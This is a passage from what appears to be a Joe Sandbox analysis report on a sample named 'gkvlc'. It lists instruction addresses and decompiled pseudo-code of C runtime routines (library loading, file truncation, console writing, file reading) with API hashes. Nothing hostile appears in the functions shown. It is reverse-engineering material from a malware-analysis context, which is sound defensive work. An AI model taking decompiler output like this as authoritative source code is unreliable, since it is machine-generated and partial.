                                                                                            0x0040748f
                                                                                            0x00407492
                                                                                            0x00407498
                                                                                            0x0040749a
                                                                                            0x0040749c
                                                                                            0x0040749c
                                                                                            0x0040749e
                                                                                            0x004074a0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004074a2
                                                                                            0x004074a4
                                                                                            0x004074a6
                                                                                            0x004074a8
                                                                                            0x004074b3
                                                                                            0x004074b5
                                                                                            0x004074b7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004074b7
                                                                                            0x004074a8
                                                                                            0x00000000
                                                                                            0x004074a4
                                                                                            0x004074b9
                                                                                            0x004074b9
                                                                                            0x004074bf
                                                                                            0x004074c1
                                                                                            0x004074c7
                                                                                            0x004074c9
                                                                                            0x004074eb
                                                                                            0x004074eb
                                                                                            0x004074ed
                                                                                            0x004074ef
                                                                                            0x004074fb
                                                                                            0x004074fb
                                                                                            0x004074f1
                                                                                            0x004074f1
                                                                                            0x004074f3
                                                                                            0x00000000
                                                                                            0x004074f5
                                                                                            0x004074f5
                                                                                            0x004074f7
                                                                                            0x004074f9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004074f9
                                                                                            0x004074f3
                                                                                            0x00407503
                                                                                            0x0040750b
                                                                                            0x00407511
                                                                                            0x00407512
                                                                                            0x00407514
                                                                                            0x0040751c
                                                                                            0x00407522
                                                                                            0x00407528
                                                                                            0x0040752e
                                                                                            0x00407542
                                                                                            0x00407547
                                                                                            0x00407552
                                                                                            0x00407562
                                                                                            0x00407568
                                                                                            0x0040756a
                                                                                            0x0040756d
                                                                                            0x00407590
                                                                                            0x00407590
                                                                                            0x00407595
                                                                                            0x0040759b
                                                                                            0x0040759b
                                                                                            0x004075a1
                                                                                            0x004075a7
                                                                                            0x004075ad
                                                                                            0x004075b3
                                                                                            0x004075b9
                                                                                            0x004075da
                                                                                            0x004075df
                                                                                            0x004075e4
                                                                                            0x004075e8
                                                                                            0x004075ee
                                                                                            0x004075f1
                                                                                            0x00407604
                                                                                            0x00407604
                                                                                            0x0040760a
                                                                                            0x00407610
                                                                                            0x00407611
                                                                                            0x00407612
                                                                                            0x00407617
                                                                                            0x0040761a
                                                                                            0x00407620
                                                                                            0x00407622
                                                                                            0x00407680
                                                                                            0x00407686
                                                                                            0x0040768e
                                                                                            0x00407693
                                                                                            0x00407699
                                                                                            0x0040769a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004075f3
                                                                                            0x004075f3
                                                                                            0x004075f6
                                                                                            0x004075f8
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x004075fd
                                                                                            0x00000000
                                                                                            0x004075ff
                                                                                            0x004075ff
                                                                                            0x00407602
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407602
                                                                                            0x004075fd
                                                                                            0x004075f8
                                                                                            0x0040769c
                                                                                            0x0040769d
                                                                                            0x00000000
                                                                                            0x00407624
                                                                                            0x00407624
                                                                                            0x0040762a
                                                                                            0x00407632
                                                                                            0x00407637
                                                                                            0x00407646
                                                                                            0x00407646
                                                                                            0x0040764e
                                                                                            0x00407654
                                                                                            0x0040765a
                                                                                            0x00407661
                                                                                            0x00407664
                                                                                            0x00407666
                                                                                            0x00407676
                                                                                            0x0040767b
                                                                                            0x00000000
                                                                                            0x0040756f
                                                                                            0x0040756f
                                                                                            0x00407575
                                                                                            0x00407576
                                                                                            0x00407577
                                                                                            0x00407578
                                                                                            0x00407580
                                                                                            0x00407580
                                                                                            0x004076a3
                                                                                            0x004076a3
                                                                                            0x004076aa
                                                                                            0x004076ab
                                                                                            0x004076b3
                                                                                            0x004076b8
                                                                                            0x004076b9
                                                                                            0x004074cb
                                                                                            0x004074cb
                                                                                            0x004074ce
                                                                                            0x004074d0
                                                                                            0x004074e5
                                                                                            0x00000000
                                                                                            0x004074d2
                                                                                            0x004074d2
                                                                                            0x004074d5
                                                                                            0x004074d6
                                                                                            0x004074d7
                                                                                            0x004074d8
                                                                                            0x004074dd
                                                                                            0x004074d0
                                                                                            0x004076be
                                                                                            0x004076bf
                                                                                            0x004076c1
                                                                                            0x004076c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407413
                                                                                            0x004073e6
                                                                                            0x004073e8
                                                                                            0x004073e9
                                                                                            0x004073eb
                                                                                            0x004073eb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407344
                                                                                            0x00407344
                                                                                            0x0040734a
                                                                                            0x0040734d
                                                                                            0x00407350
                                                                                            0x00407353
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735c
                                                                                            0x00000000
                                                                                            0x0040730d
                                                                                            0x004072db
                                                                                            0x004072db
                                                                                            0x004072de
                                                                                            0x0040736b
                                                                                            0x0040736c
                                                                                            0x00407371
                                                                                            0x00000000
                                                                                            0x00407371
                                                                                            0x00407212
                                                                                            0x00407212
                                                                                            0x00407215
                                                                                            0x0040721d
                                                                                            0x00407220
                                                                                            0x00407227
                                                                                            0x00407229
                                                                                            0x0040722b
                                                                                            0x00407246
                                                                                            0x00407247
                                                                                            0x00407248
                                                                                            0x00407249
                                                                                            0x0040724e
                                                                                            0x00407251
                                                                                            0x00407254
                                                                                            0x0040722d
                                                                                            0x0040722d
                                                                                            0x00407230
                                                                                            0x00407231
                                                                                            0x00407232
                                                                                            0x00407233
                                                                                            0x00407234
                                                                                            0x00407239
                                                                                            0x0040723b
                                                                                            0x0040723e
                                                                                            0x0040723e
                                                                                            0x00407256
                                                                                            0x00407258
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407261
                                                                                            0x00407264
                                                                                            0x00407267
                                                                                            0x00407269
                                                                                            0x0040726b
                                                                                            0x00000000
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407270
                                                                                            0x00000000
                                                                                            0x00407270
                                                                                            0x00000000
                                                                                            0x0040726b
                                                                                            0x004072e6
                                                                                            0x00407372
                                                                                            0x00407375
                                                                                            0x00407379
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00407390
                                                                                            0x00407392
                                                                                            0x00407394
                                                                                            0x00407399
                                                                                            0x0040739a
                                                                                            0x0040739e
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a9
                                                                                            0x00000000
                                                                                            0x004073b0
                                                                                            0x004071e2
                                                                                            0x004071e2
                                                                                            0x004071e9
                                                                                            0x004071ea
                                                                                            0x004071ec
                                                                                            0x004073b1
                                                                                            0x004073b5
                                                                                            0x004073b5
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: *?
                                                                                            • API String ID: 269201875-2564092906
                                                                                            • Opcode ID: 4935de69ec4051b309ea6108a192f20e96d0dd2d4ad461686ddafbadd7296c99
                                                                                            • Instruction ID: 15c2df7ebdfe9a77c713f3295871ac98e7d0d3dd4c28039b85599b5d1a79f4e3
                                                                                            • Opcode Fuzzy Hash: 4935de69ec4051b309ea6108a192f20e96d0dd2d4ad461686ddafbadd7296c99
                                                                                            • Instruction Fuzzy Hash: D0615C75D042199FDB14CFA9C8819EEFBF5EF48310B2481AAE805F7340E639AE41CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004025D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004025D3(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00404E88(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                            0x004025e0
                                                                                            0x004025e8
                                                                                            0x0040261d
                                                                                            0x004025ea
                                                                                            0x004025f3
                                                                                            0x00000000
                                                                                            0x0040261a
                                                                                            0x00402619
                                                                                            0x00402619

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402584,00000000,?,00417CD8,?,?,?,00402727,00000004,InitializeCriticalSectionEx,00410DA0,InitializeCriticalSectionEx), ref: 004025E0
                                                                                            • GetLastError.KERNEL32(?,00402584,00000000,?,00417CD8,?,?,?,00402727,00000004,InitializeCriticalSectionEx,00410DA0,InitializeCriticalSectionEx,00000000,?,004024B7), ref: 004025EA
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402612
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 3177248105-2084034818
                                                                                            • Opcode ID: a090892ada81388bdddc137cf1a72230ac15471e752ea8cf10a150470fc060f2
                                                                                            • Instruction ID: 8a169bd395328f3e5478d856bfb95de53eca961a4046af769cbe0d3d81915a5c
                                                                                            • Opcode Fuzzy Hash: a090892ada81388bdddc137cf1a72230ac15471e752ea8cf10a150470fc060f2
                                                                                            • Instruction Fuzzy Hash: E8E04F70281204B7EF101FA1FD0AB993E59BB50B55F148432FA0DF81E1DBF6A990C98D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040CA8E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E0040CA8E(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E0040CA41( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E0040514F(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00406AE1(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00408BB3(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E00406AE1(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E0040514F(__eflags))) = 0xd;
						_t36 = E0040513C(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00406F85(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E004045DF(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E0040B8F2(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E0040513C(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E0040514F(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E0040514F(_t70)));
										E00406FE2(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E004045DF(_t56, _t50, _v12);
							E00406FE2(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E0040514F(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}


























                                                                                            0x0040ca8e
                                                                                            0x0040ca97
                                                                                            0x0040caa6
                                                                                            0x0040cab4
                                                                                            0x0040cbdd
                                                                                            0x0040cbe2
                                                                                            0x00000000
                                                                                            0x0040cac9
                                                                                            0x0040cac9
                                                                                            0x0040cacc
                                                                                            0x0040cacf
                                                                                            0x0040cad2
                                                                                            0x0040cad4
                                                                                            0x0040cb99
                                                                                            0x0040cba2
                                                                                            0x0040cba9
                                                                                            0x0040cbac
                                                                                            0x0040cbaf
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cbbf
                                                                                            0x0040cbc1
                                                                                            0x0040cb66
                                                                                            0x0040cb66
                                                                                            0x0040cbe4
                                                                                            0x0040cbef
                                                                                            0x0040cbfd
                                                                                            0x0040cbfd
                                                                                            0x0040cbc8
                                                                                            0x0040cbce
                                                                                            0x0040cbdb
                                                                                            0x00000000
                                                                                            0x0040cbdb
                                                                                            0x0040cada
                                                                                            0x0040caf0
                                                                                            0x0040caf3
                                                                                            0x0040caf4
                                                                                            0x0040caf6
                                                                                            0x0040cb11
                                                                                            0x0040cb14
                                                                                            0x0040cb17
                                                                                            0x0040cb18
                                                                                            0x0040cb18
                                                                                            0x0040cb1a
                                                                                            0x0040cb2d
                                                                                            0x0040cb2d
                                                                                            0x0040cb2f
                                                                                            0x0040cb32
                                                                                            0x0040cb37
                                                                                            0x0040cb3a
                                                                                            0x0040cb3d
                                                                                            0x0040cb6f
                                                                                            0x0040cb72
                                                                                            0x0040cb79
                                                                                            0x0040cb79
                                                                                            0x0040cb7f
                                                                                            0x0040cb85
                                                                                            0x0040cb87
                                                                                            0x00000000
                                                                                            0x0040cb8c
                                                                                            0x0040cb3f
                                                                                            0x0040cb40
                                                                                            0x0040cb42
                                                                                            0x0040cb45
                                                                                            0x0040cb47
                                                                                            0x0040cb4a
                                                                                            0x0040cb4c
                                                                                            0x0040cb26
                                                                                            0x0040cb26
                                                                                            0x00000000
                                                                                            0x0040cb26
                                                                                            0x0040cb4e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cb4e
                                                                                            0x0040cb1c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cb1e
                                                                                            0x0040cb24
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cb50
                                                                                            0x0040cb50
                                                                                            0x0040cb50
                                                                                            0x0040cb58
                                                                                            0x0040cb5e
                                                                                            0x0040cb63
                                                                                            0x00000000
                                                                                            0x0040cb63
                                                                                            0x0040cafd
                                                                                            0x00000000
                                                                                            0x0040cb8f
                                                                                            0x0040cb8f
                                                                                            0x0040cb91
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cb93
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cb95
                                                                                            0x0040cb97
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040cb97
                                                                                            0x0040cada

                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0040CB5E
                                                                                            • _free.LIBCMT ref: 0040CB87
                                                                                            • SetEndOfFile.KERNEL32(00000000,0040AADD,00000000,?,?,?,?,?,?,?,?,0040AADD,?,00000000), ref: 0040CBB9
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040AADD,?,00000000,?,?,?,?,?), ref: 0040CBD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 1547350101-0
                                                                                            • Opcode ID: 38087c0cfa80624b56757224492d2a02b70a422fb8d1927ba5d7684113f5546b
                                                                                            • Instruction ID: cdc1980ca9ab92e020decdc35d7a07645e92e1d1e9ec2caf94d09ae9dc8f6d09
                                                                                            • Opcode Fuzzy Hash: 38087c0cfa80624b56757224492d2a02b70a422fb8d1927ba5d7684113f5546b
                                                                                            • Instruction Fuzzy Hash: 74419372900605DACB116BB9DC83B9E3775EF44324F15023AF415B73D1DA3CE9518A6D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004070E6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004070E6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00408248(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00408248(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00405119(GetLastError());
									_t19 =  *((intOrPtr*)(E0040514F(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00407722(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00405119(GetLastError());
						return  *((intOrPtr*)(E0040514F(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00407722(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00407708(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                                                                            0x004070ed
                                                                                            0x004070f2
                                                                                            0x00407110
                                                                                            0x00407112
                                                                                            0x00407115
                                                                                            0x00407142
                                                                                            0x0040714a
                                                                                            0x0040714c
                                                                                            0x00407165
                                                                                            0x00407168
                                                                                            0x0040716b
                                                                                            0x00407179
                                                                                            0x00407188
                                                                                            0x00407190
                                                                                            0x00407192
                                                                                            0x004071ab
                                                                                            0x004071ae
                                                                                            0x004071ae
                                                                                            0x00407194
                                                                                            0x0040719b
                                                                                            0x004071a6
                                                                                            0x004071a6
                                                                                            0x004071b0
                                                                                            0x00000000
                                                                                            0x004071b0
                                                                                            0x00407170
                                                                                            0x00407175
                                                                                            0x00407177
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407177
                                                                                            0x00407155
                                                                                            0x00000000
                                                                                            0x00407160
                                                                                            0x00407117
                                                                                            0x0040711a
                                                                                            0x0040711d
                                                                                            0x00407130
                                                                                            0x00407133
                                                                                            0x00407106
                                                                                            0x00407106
                                                                                            0x00000000
                                                                                            0x00407109
                                                                                            0x00407123
                                                                                            0x00407128
                                                                                            0x0040712a
                                                                                            0x004071b4
                                                                                            0x004071b4
                                                                                            0x00000000
                                                                                            0x0040712a
                                                                                            0x004070f4
                                                                                            0x004070f9
                                                                                            0x004070fe
                                                                                            0x00407100
                                                                                            0x00407103
                                                                                            0x00000000

                                                                                            APIs
                                                                                              • Part of subcall function 00407708: _free.LIBCMT ref: 00407716
                                                                                              • Part of subcall function 00408248: WideCharToMultiByte.KERNEL32(004033BF,00000000,?,00000000,004033BF,00000010,0040BA17,?,?,?,00000000,?,0040B786,0000FDE9,00000000,?), ref: 004082EA
                                                                                            • GetLastError.KERNEL32 ref: 0040714E
                                                                                            • __dosmaperr.LIBCMT ref: 00407155
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00407194
                                                                                            • __dosmaperr.LIBCMT ref: 0040719B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                            • String ID:
                                                                                            • API String ID: 167067550-0
                                                                                            • Opcode ID: 15dbb85e87cd489125476bbae962e9d33d6f299fd00119ebf1d5f98647b92126
                                                                                            • Instruction ID: 7e6d66a86ace24d8e7bce99ad11753d511648890c75781705974ca06b0c73fc5
                                                                                            • Opcode Fuzzy Hash: 15dbb85e87cd489125476bbae962e9d33d6f299fd00119ebf1d5f98647b92126
                                                                                            • Instruction Fuzzy Hash: 5021C771E086057FDB106F628C81967B7ADEF04368710453AF925AB3C1D738FC418BAA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040D502 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040D502(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x417920, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0040D4EB();
					E0040D4AD();
					_t13 = WriteConsoleW( *0x417920, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                            0x0040d51f
                                                                                            0x0040d523
                                                                                            0x0040d530
                                                                                            0x0040d535
                                                                                            0x0040d550
                                                                                            0x0040d550
                                                                                            0x0040d556

                                                                                            APIs
                                                                                            • WriteConsoleW.KERNEL32(004033BF,00401056,?,00000000,004033BF,?,0040CDD1,004033BF,00000001,004033BF,004033BF,?,0040B45C,00000000,8304488B,004033BF), ref: 0040D519
                                                                                            • GetLastError.KERNEL32(?,0040CDD1,004033BF,00000001,004033BF,004033BF,?,0040B45C,00000000,8304488B,004033BF,00000000,004033BF,?,0040B9B0,00000010), ref: 0040D525
                                                                                              • Part of subcall function 0040D4EB: CloseHandle.KERNEL32(FFFFFFFE,0040D535,?,0040CDD1,004033BF,00000001,004033BF,004033BF,?,0040B45C,00000000,8304488B,004033BF,00000000,004033BF), ref: 0040D4FB
                                                                                            • ___initconout.LIBCMT ref: 0040D535
                                                                                              • Part of subcall function 0040D4AD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040D4DC,0040CDBE,004033BF,?,0040B45C,00000000,8304488B,004033BF,00000000), ref: 0040D4C0
                                                                                            • WriteConsoleW.KERNEL32(004033BF,00401056,?,00000000,?,0040CDD1,004033BF,00000001,004033BF,004033BF,?,0040B45C,00000000,8304488B,004033BF,00000000), ref: 0040D54A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                            • String ID:
                                                                                            • API String ID: 2744216297-0
                                                                                            • Opcode ID: ad867b860afeed64451817542c22280986b9bc6fc85d802b316153d93d4b31b4
                                                                                            • Instruction ID: 5b334b6feb41f9e5fe149536d2484feac4b03f35f2cf4a441194fde83985ef9a
                                                                                            • Opcode Fuzzy Hash: ad867b860afeed64451817542c22280986b9bc6fc85d802b316153d93d4b31b4
                                                                                            • Instruction Fuzzy Hash: 76F01C36912114BBCF226FD9EC04ACA3F36FB083A0F018035FA0995170C6328864EB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405F42 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405F42(signed int _a4, signed short* _a8, char _a12) {
				void _v8;
				signed int _v12;
				signed int _v16;
				signed short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed short* _v32;
				void* _v36;
				long _v40;
				intOrPtr _v44;
				signed int _t84;
				intOrPtr _t86;
				signed short* _t87;
				signed int _t89;
				signed char _t90;
				signed int _t91;
				signed short _t97;
				void* _t99;
				signed short* _t100;
				signed short _t101;
				signed short* _t108;
				void* _t109;
				signed int _t111;
				intOrPtr _t112;
				signed short* _t113;
				signed int _t119;
				signed short* _t120;
				unsigned short _t121;
				char _t123;
				signed short _t124;
				signed int _t125;
				signed short* _t126;
				void* _t129;
				void* _t130;

				_t84 = _a4;
				_t108 = _a8;
				_t111 = _t84 >> 6;
				_t125 = (_t84 & 0x0000003f) * 0x38;
				_v12 = _t111;
				_t86 =  *((intOrPtr*)(0x417ed8 + _t111 * 4));
				_v44 = 0xa;
				_v36 =  *((intOrPtr*)(_t125 + _t86 + 0x18));
				_t10 =  &_a12; // 0x406750
				_t119 =  *_t10;
				if(_t119 == 0) {
					L3:
					 *(_t125 + _t86 + 0x28) =  *(_t125 + _t86 + 0x28) & 0x000000fb;
					L4:
					_t87 =  &(_t108[_t119]);
					_t126 = _t108;
					_v20 = _t87;
					_t120 = _t108;
					if(_t108 >= _t87) {
						L35:
						return _t126 - _t108 & 0xfffffffe;
					}
					_v24 = 0x1a;
					_v28 = 0xd;
					while(1) {
						_t89 =  *_t120 & 0x0000ffff;
						if(_t89 == _v24) {
							break;
						}
						_t113 =  &(_t120[1]);
						if(_t89 == _v28) {
							_t27 =  &_v20; // 0x406750
							if(_t113 >=  *_t27) {
								_v16 = _t113;
								if(ReadFile(_v36,  &_v8, 2,  &_v40, 0) == 0 || _v40 == 0) {
									_t120 = _v16;
									goto L27;
								} else {
									_t111 = _v12;
									if(( *(_t125 +  *((intOrPtr*)(0x417ed8 + _t111 * 4)) + 0x28) & 0x00000048) == 0) {
										_t97 = 0xa;
										if(_v8 != _t97 || _t126 != _t108) {
